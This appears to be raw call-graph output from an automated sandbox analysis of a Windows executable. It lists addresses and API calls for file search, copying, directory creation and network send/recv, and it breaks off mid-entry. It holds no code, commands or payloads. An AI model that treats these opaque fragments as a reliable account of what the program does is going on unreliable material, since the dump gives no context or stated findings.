89997->90000 89998 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89998->89999 90001 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 89999->90001 90002 7ff7f132c560 49 API calls 90000->90002 90003 7ff7f132f9b3 90001->90003 90005 7ff7f132ecda 90002->90005 90004 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90003->90004 90006 7ff7f132f9b9 90004->90006 90005->90003 90005->90006 90007 7ff7f132c560 49 API calls 90005->90007 90008 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90006->90008 90010 7ff7f132edd0 90007->90010 90009 7ff7f132f9bf 90008->90009 90013 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90009->90013 90010->90009 90011 7ff7f132c560 49 API calls 90010->90011 90012 7ff7f132f9c5 90010->90012 90017 7ff7f132eecf 90011->90017 90014 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90012->90014 90013->90012 90015 7ff7f132f9cb 90014->90015 90018 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90015->90018 90016 7ff7f128a7dc 49 API calls 90019 7ff7f132efab 90016->90019 90017->90015 90017->90016 90020 7ff7f132f9d1 90017->90020 90018->90020 90021 7ff7f132c560 49 API calls 90019->90021 90022 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90020->90022 90026 7ff7f132efbf 90021->90026 90023 7ff7f132f9d7 90022->90023 90024 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90023->90024 90025 7ff7f132f9dd 90024->90025 90030 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90025->90030 90026->90023 90026->90025 90027 7ff7f128a7dc 49 API calls 90026->90027 90028 7ff7f132f095 90027->90028 90029 7ff7f132c560 49 API calls 90028->90029 90033 7ff7f132f0a9 90029->90033 90031 7ff7f132f9e3 90030->90031 90032 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90031->90032 90035 7ff7f132f9e9 90032->90035 90033->90031 90034 7ff7f128a7dc 49 API calls 90033->90034 90033->90035 90036 7ff7f132f17f 90034->90036 90037 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90035->90037 90038 7ff7f132c560 49 API calls 90036->90038 90040 7ff7f132f9ef 90037->90040 90039 7ff7f132f193 90038->90039 90039->90040 90042 7ff7f132c560 49 API calls 90039->90042 90043 7ff7f132f9f5 90039->90043 90041 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90040->90041 90041->90043 90046 7ff7f132f289 90042->90046 90044 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90043->90044 90045 7ff7f132f9fb 90044->90045 90050 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90045->90050 90046->90045 90047 7ff7f128a7dc 49 API calls 90046->90047 90048 7ff7f132fa01 90046->90048 90049 7ff7f132f332 90047->90049 90052 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90048->90052 90051 7ff7f128a7dc 49 API calls 90049->90051 90050->90048 90053 7ff7f132f35b 90051->90053 90054 7ff7f132fa07 90052->90054 90055 7ff7f132c560 49 API calls 90053->90055 90056 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90054->90056 90059 7ff7f132f36f 90055->90059 90057 7ff7f132fa0d 90056->90057 90058 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90057->90058 90061 7ff7f132fa13 90058->90061 90059->90054 90060 7ff7f132f42c 90059->90060 90062 7ff7f132f9a2 90059->90062 91117 7ff7f12902d0 49 API calls 2 library calls 90059->91117 90064 7ff7f1292bdc 47 API calls 90060->90064 90066 7ff7f1330b3c 3 API calls 90061->90066 90065 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90062->90065 90067 7ff7f132f458 90064->90067 90065->90068 90069 7ff7f132fa39 90066->90069 90067->90057 90070 7ff7f132f4eb 90067->90070 90071 7ff7f128f8e8 49 API calls 90067->90071 90068->89998 90073 7ff7f128a7dc 49 API calls 90069->90073 90072 7ff7f1292bdc 47 API calls 90070->90072 90071->90070 90074 7ff7f132f520 90072->90074 90075 7ff7f132fa6b 90073->90075 90074->90062 90076 7ff7f132f557 90074->90076 90077 7ff7f132faa3 90075->90077 91132 7ff7f12902d0 49 API calls 2 library calls 90075->91132 90078 7ff7f132f59b 90076->90078 91118 7ff7f12902d0 49 API calls 2 library calls 90076->91118 90081 7ff7f1330c3c 50 API calls 90077->90081 90083 7ff7f1292bdc 47 API calls 90078->90083 90082 7ff7f132facc SetCurrentDirectoryW CreateDirectoryW 90081->90082 90084 7ff7f1290040 49 API calls 90082->90084 90085 7ff7f132f5c7 90083->90085 90086 7ff7f132fb0c 90084->90086 90087 7ff7f132f5e1 90085->90087 91119 7ff7f128f8a4 47 API calls _invalid_parameter_noinfo_noreturn 90085->91119 90089 7ff7f12900b4 49 API calls 90086->90089 90088 7ff7f132f620 90087->90088 91120 7ff7f12902d0 49 API calls 2 library calls 90087->91120 90093 7ff7f1292bdc 47 API calls 90088->90093 90091 7ff7f132fb1e 90089->90091 90094 7ff7f128f840 47 API calls 90091->90094 90095 7ff7f132f64c 90093->90095 90096 7ff7f132fb29 SetCurrentDirectoryW SetCurrentDirectoryW CreateDirectoryW 90094->90096 90097 7ff7f132f666 90095->90097 91121 7ff7f128f8a4 47 API calls _invalid_parameter_noinfo_noreturn 90095->91121 90098 7ff7f1290040 49 API calls 90096->90098 90100 7ff7f132f6a8 90097->90100 91122 7ff7f12902d0 49 API calls 2 library calls 90097->91122 90101 7ff7f132fb7c SetCurrentDirectoryW 90098->90101 90104 7ff7f1292bdc 47 API calls 90100->90104 90103 7ff7f13312a4 49 API calls 90101->90103 90105 7ff7f132fb98 90103->90105 90106 7ff7f132f6d4 90104->90106 90107 7ff7f12906c4 49 API calls 90105->90107 90108 7ff7f132f6ee 90106->90108 91123 7ff7f128f8a4 47 API calls _invalid_parameter_noinfo_noreturn 90106->91123 90109 7ff7f132fbd4 90107->90109 90112 7ff7f132f730 90108->90112 91124 7ff7f12902d0 49 API calls 2 library calls 90108->91124 90111 7ff7f1330cd8 55 API calls 90109->90111 90114 7ff7f132fbdf 90111->90114 90115 7ff7f1292bdc 47 API calls 90112->90115 90116 7ff7f12906c4 49 API calls 90114->90116 90118 7ff7f132f75c 90115->90118 90117 7ff7f132fc1b 90116->90117 90119 7ff7f1331110 55 API calls 90117->90119 90120 7ff7f132f776 90118->90120 91125 7ff7f128f8a4 47 API calls _invalid_parameter_noinfo_noreturn 90118->91125 90121 7ff7f132fc26 90119->90121 90123 7ff7f132f7b8 90120->90123 91126 7ff7f12902d0 49 API calls 2 library calls 90120->91126 90124 7ff7f12906c4 49 API calls 90121->90124 90127 7ff7f1292bdc 47 API calls 90123->90127 90129 7ff7f132f7e4 90127->90129 90131 7ff7f132f7fe 90129->90131 91127 7ff7f128f8a4 47 API calls _invalid_parameter_noinfo_noreturn 90129->91127 90134 7ff7f132f840 90131->90134 90902->89399 90982 7ff7f132c344 90947->90982 90951 7ff7f132c631 90951->89562 90952 7ff7f132c5a9 90952->90951 90953 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90952->90953 90954 7ff7f132c65f 90953->90954 90956 7ff7f1292bf1 90955->90956 90957 7ff7f1292bf6 90955->90957 90958 7ff7f128f840 47 API calls 90956->90958 90957->89736 90958->90957 90960 7ff7f129002b 90959->90960 90961 7ff7f129001e 90959->90961 91053 7ff7f12902d0 49 API calls 2 library calls 90960->91053 90961->89758 90964 7ff7f128a37f 90963->90964 90965 7ff7f128a3a3 90963->90965 90964->90965 90966 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 90964->90966 90965->89847 90967 7ff7f128a3c6 90966->90967 90967->89847 90978->89732 90979->89738 90980->89744 90981->89750 90983 7ff7f132c366 90982->90983 90998 7ff7f132c38c 90983->90998 90986 7ff7f128e6b0 90987 7ff7f128e6e5 90986->90987 90988 7ff7f128e789 90986->90988 90990 7ff7f128e710 90987->90990 90995 7ff7f128e749 90987->90995 90996 7ff7f128e6eb __scrt_get_show_window_mode 90987->90996 91046 7ff7f1289830 49 API calls std::_Xinvalid_argument 90988->91046 91002 7ff7f128c840 90990->91002 91037 7ff7f12fa2c4 90995->91037 90996->90952 90999 7ff7f132c3de 90998->90999 91001 7ff7f132c373 90998->91001 91000 7ff7f128e6b0 49 API calls 90999->91000 91000->91001 91001->90986 91003 7ff7f128c873 91002->91003 91004 7ff7f128c84d 91002->91004 91047 7ff7f1289780 49 API calls 2 library calls 91003->91047 91005 7ff7f12fa2c4 std::_Facet_Register 49 API calls 91004->91005 91007 7ff7f128c855 91005->91007 91008 7ff7f128c85d 91007->91008 91009 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 91007->91009 91008->90996 91009->91003 91011 7ff7f128c8d0 91013 7ff7f128c840 49 API calls 91011->91013 91012 7ff7f128ca1f 91049 7ff7f1289780 49 API calls 2 library calls 91012->91049 91022 7ff7f128c908 __scrt_get_show_window_mode ctype 91013->91022 91014 7ff7f128c879 91014->91011 91014->91012 91017 7ff7f128c92f 91014->91017 91014->91022 91035 7ff7f128ca19 91014->91035 91016 7ff7f128ca25 91019 7ff7f128ca68 91016->91019 91020 7ff7f128cb5b 91016->91020 91018 7ff7f12fa2c4 std::_Facet_Register 49 API calls 91017->91018 91018->91022 91021 7ff7f128ca8d 91019->91021 91025 7ff7f128cab0 ctype 91019->91025 91026 7ff7f128cac4 91019->91026 91050 7ff7f1289830 49 API calls std::_Xinvalid_argument 91020->91050 91024 7ff7f128c840 49 API calls 91021->91024 91028 7ff7f128c9e4 91022->91028 91033 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 91022->91033 91024->91025 91027 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 91025->91027 91032 7ff7f128cb17 ctype 91025->91032 91026->91025 91029 7ff7f12fa2c4 std::_Facet_Register 49 API calls 91026->91029 91031 7ff7f128cb66 91027->91031 91028->90996 91029->91025 91030 7ff7f128cb9e 91030->90996 91031->91030 91034 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 91031->91034 91032->90996 91033->91035 91036 7ff7f128cbbf 91034->91036 91048 7ff7f128be74 49 API calls std::_Xinvalid_argument 91035->91048 91038 7ff7f12fa2cf 91037->91038 91039 7ff7f12fa2e8 91038->91039 91040 7ff7f1315cd4 std::_Facet_Register 2 API calls 91038->91040 91041 7ff7f12fa2ee 91038->91041 91039->90996 91040->91038 91042 7ff7f12fa2f9 91041->91042 91051 7ff7f12fadf4 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 91041->91051 91052 7ff7f1289780 49 API calls 2 library calls 91042->91052 91045 7ff7f12fa2ff 91047->91014 91049->91016 91052->91045 91053->90961 91055->89896 91057 7ff7f128f9dd 91056->91057 91058 7ff7f128f91c 91056->91058 91104 7ff7f1289830 49 API calls std::_Xinvalid_argument 91057->91104 91060 7ff7f128f952 91058->91060 91061 7ff7f128f9e2 91058->91061 91068 7ff7f128f922 ctype 91058->91068 91062 7ff7f128f969 91060->91062 91063 7ff7f128f99c 91060->91063 91060->91068 91105 7ff7f1289780 49 API calls 2 library calls 91061->91105 91066 7ff7f128c840 49 API calls 91062->91066 91065 7ff7f12fa2c4 std::_Facet_Register 49 API calls 91063->91065 91065->91068 91066->91068 91067 7ff7f128f9e8 91068->89933 91070 7ff7f1290040 49 API calls 91069->91070 91071 7ff7f1330185 FindFirstFileW 91070->91071 91072 7ff7f13305cc 91071->91072 91097 7ff7f13301b5 91071->91097 91073 7ff7f128f840 47 API calls 91072->91073 91074 7ff7f13305d5 91073->91074 91075 7ff7f128f840 47 API calls 91074->91075 91077 7ff7f13305de 91075->91077 91076 7ff7f128f8e8 49 API calls 91076->91097 91077->89935 91078 7ff7f1290040 49 API calls 91100 7ff7f1330392 91078->91100 91079 7ff7f1295fec 49 API calls 91079->91100 91080 7ff7f13305aa FindNextFileW 91081 7ff7f13305c2 FindClose 91080->91081 91080->91097 91081->91072 91082 7ff7f128f840 47 API calls 91083 7ff7f13304e0 CopyFileW 91082->91083 91084 7ff7f1330512 91083->91084 91084->91080 91085 7ff7f13305f9 91084->91085 91086 7ff7f13305fe 91084->91086 91087 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 91085->91087 91088 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 91086->91088 91087->91086 91089 7ff7f1330604 91088->91089 91090 7ff7f1330605 91089->91090 91091 7ff7f1303228 _invalid_parameter_noinfo_noreturn 47 API calls 91090->91091 91093 7ff7f133060a 91091->91093 91092 7ff7f128f840 47 API calls 91092->91097 91093->89935 91094 7ff7f1290040 49 API calls 91094->91097 91096 7ff7f12900b4 49 API calls 91096->91097 91097->91076 91097->91080 91097->91090 91097->91092 91097->91094 91097->91096 91097->91100 91106 7ff7f1290240 91097->91106 91098 7ff7f128f840 47 API calls 91099 7ff7f13303c2 CreateDirectoryW 91098->91099 91099->91100 91100->91078 91100->91079 91100->91082 91100->91097 91100->91098 91101 7ff7f12906c4 49 API calls 91100->91101 91102 7ff7f1330138 49 API calls 91100->91102 91103 7ff7f128f840 47 API calls 91100->91103 91101->91100 91102->91100 91103->91100 91105->91067 91107 7ff7f1290293 91106->91107 91109 7ff7f1290265 ctype 91106->91109 91110 7ff7f12903d8 49 API calls 4 library calls 91107->91110 91109->91097 91110->91109 91112 7ff7f1330692 91111->91112 91113 7ff7f1330670 91111->91113 91114 7ff7f128f8e8 49 API calls 91112->91114 91116 7ff7f128f8e8 49 API calls 91113->91116 91115 7ff7f1330690 91114->91115 91115->89945 91116->91115 91117->90060 91118->90078 91120->90088 91122->90100 91124->90112 91126->90123 91132->90077 91971 7ff7f1303d94 91972 7ff7f1303db1 91971->91972 91973 7ff7f1303dbd 91971->91973 91975 7ff7f13034d4 71 API calls 91972->91975 91974 7ff7f13038c0 wcsftime 47 API calls 91973->91974 91976 7ff7f1303de5 91974->91976 91977 7ff7f1303db6 91975->91977 91979 7ff7f1303df5 91976->91979 92013 7ff7f131c098 5 API calls __crtLCMapStringW 91976->92013 91980 7ff7f1303358 wcsftime 14 API calls 91979->91980 91981 7ff7f1303e4d 91980->91981 91982 7ff7f1303e65 91981->91982 91983 7ff7f1303e51 91981->91983 91988 7ff7f13034d4 91982->91988 91983->91977 91985 7ff7f131b6e0 __free_lconv_mon 11 API calls 91983->91985 91985->91977 91987 7ff7f131b6e0 __free_lconv_mon 11 API calls 91987->91977 91989 7ff7f13034f1 91988->91989 91990 7ff7f130350e 91988->91990 92040 7ff7f130b5d0 11 API calls _Strcoll 91989->92040 91990->91989 91992 7ff7f1303533 CreateFileW 91990->91992 91993 7ff7f1303566 91992->91993 91994 7ff7f13035ae 91992->91994 92014 7ff7f1303674 GetFileType 91993->92014 92043 7ff7f1303b9c 56 API calls 3 library calls 91994->92043 91995 7ff7f13034f6 92041 7ff7f130b5f0 11 API calls _Strcoll 91995->92041 92000 7ff7f13035b3 92004 7ff7f13035f9 92000->92004 92005 7ff7f13035b7 92000->92005 92001 7ff7f13034fe 92042 7ff7f1303208 47 API calls _invalid_parameter_noinfo 92001->92042 92002 7ff7f13035a3 CloseHandle 92007 7ff7f1303509 92002->92007 92003 7ff7f130357b CloseHandle 92003->92007 92045 7ff7f130395c 92004->92045 92044 7ff7f130b564 11 API calls 2 library calls 92005->92044 92007->91977 92007->91987 92012 7ff7f13035c1 92012->92007 92013->91979 92015 7ff7f13036c2 92014->92015 92016 7ff7f1303780 92014->92016 92017 7ff7f13036ee GetFileInformationByHandle 92015->92017 92063 7ff7f1303a98 21 API calls wcsftime 92015->92063 92018 7ff7f13037aa 92016->92018 92019 7ff7f1303788 92016->92019 92021 7ff7f130379b GetLastError 92017->92021 92022 7ff7f1303717 92017->92022 92023 7ff7f13037cd PeekNamedPipe 92018->92023 92028 7ff7f1303769 92018->92028 92020 7ff7f130378c 92019->92020 92019->92021 92065 7ff7f130b5f0 11 API calls _Strcoll 92020->92065 92066 7ff7f130b564 11 API calls 2 library calls 92021->92066 92026 7ff7f130395c 53 API calls 92022->92026 92023->92028 92030 7ff7f1303722 92026->92030 92031 7ff7f12fa740 _Strcoll 8 API calls 92028->92031 92029 7ff7f13036dc 92029->92017 92029->92028 92056 7ff7f1303820 92030->92056 92033 7ff7f1303574 92031->92033 92033->92002 92033->92003 92035 7ff7f1303820 10 API calls 92036 7ff7f1303741 92035->92036 92037 7ff7f1303820 10 API calls 92036->92037 92038 7ff7f1303752 92037->92038 92038->92028 92064 7ff7f130b5f0 11 API calls _Strcoll 92038->92064 92040->91995 92041->92001 92042->92007 92043->92000 92044->92012 92046 7ff7f1303984 92045->92046 92054 7ff7f1303606 92046->92054 92067 7ff7f131bb6c 53 API calls 4 library calls 92046->92067 92048 7ff7f1303a18 92048->92054 92068 7ff7f131bb6c 53 API calls 4 library calls 92048->92068 92050 7ff7f1303a2b 92050->92054 92069 7ff7f131bb6c 53 API calls 4 library calls 92050->92069 92052 7ff7f1303a3e 92052->92054 92070 7ff7f131bb6c 53 API calls 4 library calls 92052->92070 92055 7ff7f1303a98 21 API calls wcsftime 92054->92055 92055->92012 92057 7ff7f130383c 92056->92057 92058 7ff7f1303849 FileTimeToSystemTime 92056->92058 92057->92058 92060 7ff7f1303844 92057->92060 92059 7ff7f130385d SystemTimeToTzSpecificLocalTime 92058->92059 92058->92060 92059->92060 92061 7ff7f12fa740 _Strcoll 8 API calls 92060->92061 92062 7ff7f1303731 92061->92062 92062->92035 92063->92029 92064->92028 92065->92028 92066->92028 92067->92048 92068->92050 92069->92052 92070->92054 92071 7ff7f129cdd2 92072 7ff7f129cde8 92071->92072 92073 7ff7f129ce48 92072->92073 92076 7ff7f129d084 92072->92076 92115 7ff7f12b9f90 92073->92115 92077 7ff7f129d0af 92076->92077 92078 7ff7f129d0e3 92076->92078 92079 7ff7f12baae0 2 API calls 92077->92079 92081 7ff7f12baae0 2 API calls 92078->92081 92082 7ff7f129d0b8 92079->92082 92084 7ff7f129d0ec 92081->92084 92146 7ff7f129a1e0 84 API calls 92082->92146 92083 7ff7f129ce70 92085 7ff7f129d037 92083->92085 92086 7ff7f129ce82 92083->92086 92147 7ff7f129a1e0 84 API calls 92084->92147 92145 7ff7f129bd60 165 API calls 92085->92145 92091 7ff7f129ce9f 92086->92091 92093 7ff7f129cfe3 92086->92093 92090 7ff7f129cf02 92107 7ff7f129c260 92090->92107 92148 7ff7f12b2810 10 API calls _Strcoll 92090->92148 92092 7ff7f129cf6a 92091->92092 92095 7ff7f129ceb5 92091->92095 92142 7ff7f129bd60 165 API calls 92092->92142 92093->92090 92096 7ff7f12baae0 2 API calls 92093->92096 92095->92090 92139 7ff7f12b94a0 85 API calls 92095->92139 92098 7ff7f129d005 92096->92098 92144 7ff7f129a1e0 84 API calls 92098->92144 92100 7ff7f129d464 92101 7ff7f129cfa1 92143 7ff7f12b94a0 85 API calls 92101->92143 92107->92100 92109 7ff7f12af6f0 84 API calls 92107->92109 92110 7ff7f129bce0 84 API calls 92107->92110 92112 7ff7f129a0d0 84 API calls 92107->92112 92138 7ff7f12b2810 10 API calls _Strcoll 92107->92138 92149 7ff7f129bd60 165 API calls 92107->92149 92150 7ff7f12a5110 94 API calls 92107->92150 92151 7ff7f12c3ec0 QueryPerformanceCounter GetTickCount 92107->92151 92152 7ff7f12c3d80 86 API calls 92107->92152 92108 7ff7f129ceea 92108->92090 92140 7ff7f129bd60 165 API calls 92108->92140 92109->92107 92110->92107 92112->92107 92116 7ff7f12b9fc3 92115->92116 92119 7ff7f12ba005 92116->92119 92131 7ff7f129ce57 92116->92131 92153 7ff7f12ba730 92116->92153 92118 7ff7f12ba04c 92118->92131 92169 7ff7f12c3d80 86 API calls 92118->92169 92119->92118 92119->92131 92163 7ff7f12a1700 92119->92163 92121 7ff7f12ba074 92121->92131 92170 7ff7f12c5090 84 API calls 92121->92170 92124 7ff7f12ba092 92125 7ff7f12ba162 92124->92125 92126 7ff7f12ba0a5 92124->92126 92124->92131 92127 7ff7f12ba1a0 92125->92127 92132 7ff7f12ba187 92125->92132 92171 7ff7f12b2810 10 API calls _Strcoll 92126->92171 92175 7ff7f12c3d80 86 API calls 92127->92175 92130 7ff7f12ba0b3 92130->92131 92133 7ff7f12ba0d0 92130->92133 92134 7ff7f12ba12c 92130->92134 92131->92083 92141 7ff7f12b9e30 84 API calls 92131->92141 92174 7ff7f12af6f0 84 API calls 2 library calls 92132->92174 92172 7ff7f12af6f0 84 API calls 2 library calls 92133->92172 92173 7ff7f12af6f0 84 API calls 2 library calls 92134->92173 92138->92107 92139->92108 92140->92090 92141->92083 92142->92101 92143->92090 92144->92090 92145->92090 92146->92090 92147->92090 92148->92107 92149->92107 92150->92107 92151->92107 92152->92107 92176 7ff7f129abc0 92153->92176 92155 7ff7f12ba983 92155->92119 92158 7ff7f12ba77d 92158->92155 92159 7ff7f12ba8f8 92158->92159 92188 7ff7f12ba2f0 92158->92188 92194 7ff7f12ba680 84 API calls 92158->92194 92159->92155 92160 7ff7f12af7e0 84 API calls 92159->92160 92161 7ff7f12ba97b 92160->92161 92195 7ff7f12a1320 84 API calls 92161->92195 92164 7ff7f12a1716 92163->92164 92168 7ff7f12a175a 92163->92168 92164->92168 92245 7ff7f12c98b0 92164->92245 92166 7ff7f12a1770 92166->92118 92168->92166 92249 7ff7f12a1ba0 92168->92249 92169->92121 92170->92124 92171->92130 92172->92131 92173->92131 92174->92131 92175->92131 92177 7ff7f129abf1 92176->92177 92178 7ff7f129ac0a 92176->92178 92196 7ff7f12af6f0 84 API calls 2 library calls 92177->92196 92180 7ff7f129ac14 92178->92180 92181 7ff7f129ac2d 92178->92181 92197 7ff7f12af6f0 84 API calls 2 library calls 92180->92197 92183 7ff7f129ac36 92181->92183 92186 7ff7f129ac4f 92181->92186 92198 7ff7f12af6f0 84 API calls 2 library calls 92183->92198 92185 7ff7f129ac00 92185->92158 92186->92185 92199 7ff7f12af6f0 84 API calls 2 library calls 92186->92199 92190 7ff7f12ba31d 92188->92190 92189 7ff7f12ba3d9 92191 7ff7f12ba435 92189->92191 92192 7ff7f12af1d0 86 API calls 92189->92192 92190->92189 92200 7ff7f12af140 92190->92200 92191->92158 92192->92191 92194->92158 92195->92155 92196->92185 92197->92185 92198->92185 92199->92185 92203 7ff7f12b6b60 recv 92200->92203 92204 7ff7f12b6c36 92203->92204 92205 7ff7f12b6bc4 WSAGetLastError 92203->92205 92207 7ff7f12af830 82 API calls 92204->92207 92206 7ff7f12b6bfe 92205->92206 92217 7ff7f12b6bd3 92205->92217 92237 7ff7f12c5ab0 53 API calls 2 library calls 92206->92237 92209 7ff7f12b6c56 92207->92209 92213 7ff7f12b6bf9 92209->92213 92215 7ff7f12baae0 2 API calls 92209->92215 92211 7ff7f12b6c10 92238 7ff7f12af6f0 84 API calls 2 library calls 92211->92238 92212 7ff7f12fa740 _Strcoll 8 API calls 92216 7ff7f12af165 92212->92216 92213->92212 92215->92213 92216->92189 92218 7ff7f12af830 92217->92218 92219 7ff7f12af983 92218->92219 92222 7ff7f12af839 92218->92222 92219->92213 92220 7ff7f12af973 92221 7ff7f12fa740 _Strcoll 8 API calls 92220->92221 92221->92219 92222->92220 92223 7ff7f12af8d0 92222->92223 92239 7ff7f12c7670 8 API calls 92222->92239 92224 7ff7f12af8f1 92223->92224 92225 7ff7f12af903 92223->92225 92240 7ff7f12c7670 8 API calls 92224->92240 92241 7ff7f12c7670 8 API calls 92225->92241 92229 7ff7f12af901 92242 7ff7f12c7780 8 API calls 92229->92242 92231 7ff7f12af937 92232 7ff7f12af98d 92231->92232 92233 7ff7f12af95e 92231->92233 92244 7ff7f12fa868 8 API calls std::_Locinfo::_Locinfo_ctor 92232->92244 92243 7ff7f12af600 78 API calls 92233->92243 92236 7ff7f12af992 92237->92211 92238->92217 92239->92223 92240->92229 92241->92229 92242->92231 92243->92220 92244->92236 92246 7ff7f12c98e4 92245->92246 92247 7ff7f12c98ec 92246->92247 92256 7ff7f12a1b40 92246->92256 92247->92168 92250 7ff7f12a1cb2 92249->92250 92251 7ff7f12a1bb2 92249->92251 92250->92166 92251->92250 92253 7ff7f12a1bde 92251->92253 92305 7ff7f12a1cc0 92251->92305 92255 7ff7f12a1c25 92253->92255 92310 7ff7f12a1eb0 93 API calls 92253->92310 92255->92166 92259 7ff7f12b0a00 92256->92259 92260 7ff7f12b0a37 92259->92260 92261 7ff7f12b0a2b 92259->92261 92262 7ff7f12b0a5b 92260->92262 92264 7ff7f12a1b64 92260->92264 92267 7ff7f12a2000 92260->92267 92294 7ff7f12b1110 84 API calls 92261->92294 92295 7ff7f12afa00 84 API calls 92262->92295 92264->92247 92268 7ff7f12a2054 92267->92268 92269 7ff7f12a2027 92267->92269 92271 7ff7f12a2082 92268->92271 92272 7ff7f12a205a 92268->92272 92296 7ff7f12afa00 84 API calls 92269->92296 92274 7ff7f12a209b 92271->92274 92275 7ff7f12a20d0 92271->92275 92297 7ff7f12afa00 84 API calls 92272->92297 92298 7ff7f12afa00 84 API calls 92274->92298 92299 7ff7f12afa00 84 API calls 92275->92299 92278 7ff7f12a20fc 92280 7ff7f12a2105 92278->92280 92283 7ff7f12a21f4 92278->92283 92281 7ff7f12a2112 92280->92281 92282 7ff7f12a21c3 92280->92282 92286 7ff7f12a2198 92281->92286 92287 7ff7f12a211b 92281->92287 92302 7ff7f12af6f0 84 API calls 2 library calls 92282->92302 92288 7ff7f12a2206 92283->92288 92292 7ff7f12a20bb 92283->92292 92284 7ff7f12a203a 92284->92262 92301 7ff7f12afa00 84 API calls 92286->92301 92290 7ff7f12a2126 92287->92290 92287->92292 92303 7ff7f12af6f0 84 API calls 2 library calls 92288->92303 92300 7ff7f12af6f0 84 API calls 2 library calls 92290->92300 92304 7ff7f12afa00 84 API calls 92292->92304 92294->92260 92295->92264 92296->92284 92297->92284 92298->92292 92299->92278 92300->92284 92301->92292 92302->92284 92303->92284 92304->92284 92308 7ff7f12a1ce4 92305->92308 92307 7ff7f12a1e74 92307->92253 92308->92307 92309 7ff7f12af600 78 API calls 92308->92309 92311 7ff7f12ba480 92308->92311 92309->92308 92310->92255 92312 7ff7f12ba4a1 92311->92312 92315 7ff7f12af180 92312->92315 92318 7ff7f12b6950 send 92315->92318 92319 7ff7f12b69d4 WSAGetLastError 92318->92319 92321 7ff7f12b6a26 92318->92321 92320 7ff7f12b69ee 92319->92320 92334 7ff7f12b69e3 92319->92334 92335 7ff7f12c5ab0 53 API calls 2 library calls 92320->92335 92324 7ff7f12baae0 2 API calls 92321->92324 92321->92334 92323 7ff7f12af830 82 API calls 92326 7ff7f12b6b25 92323->92326 92327 7ff7f12b6a39 92324->92327 92325 7ff7f12b6a03 92336 7ff7f12af6f0 84 API calls 2 library calls 92325->92336 92329 7ff7f12fa740 _Strcoll 8 API calls 92326->92329 92331 7ff7f12b6a73 WSAIoctl 92327->92331 92327->92334 92330 7ff7f12af1ae 92329->92330 92330->92308 92332 7ff7f12b6ab7 92331->92332 92331->92334 92333 7ff7f12b6ac3 setsockopt 92332->92333 92332->92334 92333->92334 92334->92323 92335->92325 92336->92334 92337 7ff7f12b1910 92338 7ff7f12b1951 92337->92338 92339 7ff7f12b1946 92337->92339 92340 7ff7f12b195b 92338->92340 92366 7ff7f12b3580 84 API calls 92338->92366 92342 7ff7f12fa740 _Strcoll 8 API calls 92339->92342 92340->92339 92349 7ff7f12b2dd0 92340->92349 92344 7ff7f12b1ab3 92342->92344 92345 7ff7f12b199a 92345->92339 92347 7ff7f12b1a02 92345->92347 92367 7ff7f12c3a30 QueryPerformanceCounter GetTickCount 92345->92367 92347->92339 92348 7ff7f12af830 82 API calls 92347->92348 92348->92339 92365 7ff7f12b2e30 92349->92365 92350 7ff7f12baae0 2 API calls 92350->92365 92351 7ff7f12af830 82 API calls 92351->92365 92352 7ff7f12b33fc 92353 7ff7f12af830 82 API calls 92352->92353 92360 7ff7f12b3405 92352->92360 92357 7ff7f12b3423 92353->92357 92354 7ff7f12b2f69 WSASetLastError 92354->92365 92355 7ff7f12b351c 92370 7ff7f12af6f0 84 API calls 2 library calls 92355->92370 92356 7ff7f12af830 82 API calls 92356->92357 92357->92356 92361 7ff7f12b346d 92357->92361 92358 7ff7f12af7e0 84 API calls 92358->92365 92360->92345 92369 7ff7f12af6f0 84 API calls 2 library calls 92361->92369 92364 7ff7f12b2930 84 API calls 92364->92365 92365->92350 92365->92351 92365->92352 92365->92354 92365->92355 92365->92358 92365->92360 92365->92364 92368 7ff7f129a080 84 API calls 92365->92368 92366->92340 92367->92347 92368->92365 92369->92360 92370->92360 92371 7ff7f12adf90 92372 7ff7f12adfb0 92371->92372 92373 7ff7f12adf9d 92371->92373 92376 7ff7f12b6910 92373->92376 92379 7ff7f12c4dc0 92376->92379 92380 7ff7f12c4ded 92379->92380 92382 7ff7f12c4e04 92379->92382 92381 7ff7f12c4df7 92380->92381 92380->92382 92389 7ff7f12c4f20 WSASetLastError Sleep 92381->92389 92385 7ff7f12c4840 17 API calls 92382->92385 92384 7ff7f12c4dff 92387 7ff7f12c4e66 92384->92387 92385->92387 92386 7ff7f12fa740 _Strcoll 8 API calls 92388 7ff7f12adfa3 92386->92388 92387->92386 92389->92384 92390 7ff7f12ccbf0 92391 7ff7f12ed880 28 API calls 92390->92391 92392 7ff7f12ccbf9 92391->92392 92393 7ff7f131cf40 92394 7ff7f131d132 92393->92394 92399 7ff7f131cf82 _isindst 92393->92399 92440 7ff7f130b5f0 11 API calls _Strcoll 92394->92440 92396 7ff7f131d122 92397 7ff7f12fa740 _Strcoll 8 